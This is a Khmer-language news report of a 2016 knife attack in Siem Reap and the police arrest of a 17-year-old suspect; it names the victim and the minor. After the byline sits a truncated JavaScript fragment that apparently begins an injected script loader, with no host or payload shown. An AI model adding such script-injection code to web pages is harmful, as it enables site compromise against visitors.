Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

យុវជនម្នាក់ ត្រូវបានសមត្ថកិច្ចនគរបាលឃាត់ខ្លួន ក្រោយពេលកាប់ជនរងគ្រោះឲ្យរបួស

សៀមរាប៖ នៅមុខសណ្ឋាគារសុខាថ្មី តាមបណ្ដោយផ្លូវ៦០ម៉ែត្រ កាលពីវេលាម៉ោង ១៨ៈ០០នាទីថ្ងៃទី២៣ ខែតុលា ឆ្នាំ២០១៦ មានករណីហឹង្សា ដោយចេនា បង្កឡើងដោយក្រុមក្មេងស្ទាវជិះម៉ូតូដេញកាប់គ្នា បណ្ដាលឲ្យភាគីម្ខាងរងរបួសធ្ងន់។លោកវរសេនីយ៍ឯក ទិត្យ ណារ៉ុង អធិការនគរបាលក្រុងសៀមរាប បានឲ្យដឹងថា ជនរងគ្រោះនៅក្នុងករណីហឹង្សាខាងលើនេះមានឈ្មោះ មួន វាសនា ភេទប្រុស អាយុ១៩ឆ្នាំ រស់នៅភូមិវាល សង្កាត់គោកចក ក្រុង-ខេត្តសៀមរាប ជាសិស្ស ត្រូវបានជនសង្ស័យកាប់ត្រូវ ០២កន្លែង បោះដៃផុតខាងស្តាំ ០១កន្លែង និងត្រូវម្រាមដៃស្ តាំ០១កន្លែងទៀត ជនរងគ្រោះត្រូវបានបញ្ជូនទៅជួយសង្គ្រោះនៅមន្ទីពេទ្យភ្លាមៗផងដែរ។

ក្រោយពេលកើតហេតុកម្លាំងនគរបាលក្រុងសៀមរាប បានធ្វើការឃាត់ខ្លួនជនសង្ស័យម្នាក់ ក្នុងចំណោមបក្សពួក ០៣នាក់។
លោកអធិការនគរបាលក្រុងបានបន្តថា ជនសង្ស័យមានឈ្មោះ វ៉ូ មករា ប្រុស អាយុ ១៧ឆ្នាំ រស់នៅភូមិវិហារចិន សង្កាត់ស្វាយដង្គុំ ក្រុង-ខេត្តសៀមរាប រីឯជនសង្ស័យក ០២នាក់ទៀតសមត្ថកិច្ចកំពុងធ្វើការស្រាវជ្រាវ។

បច្ចុប្បន្នជនសង្ស័យ និងវត្ថុតាងត្រូវបានសមត្ថកិច្ចនគរបាលក្រុង បានរៀបចំសំណុំរឿងបញ្ជូនទៅកាន់ការិយាល័យនគរបាលជំនាញ ដើម្បីធ្វើការសាកសួរបន្ត។

ដោយ រើត សុធីvar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More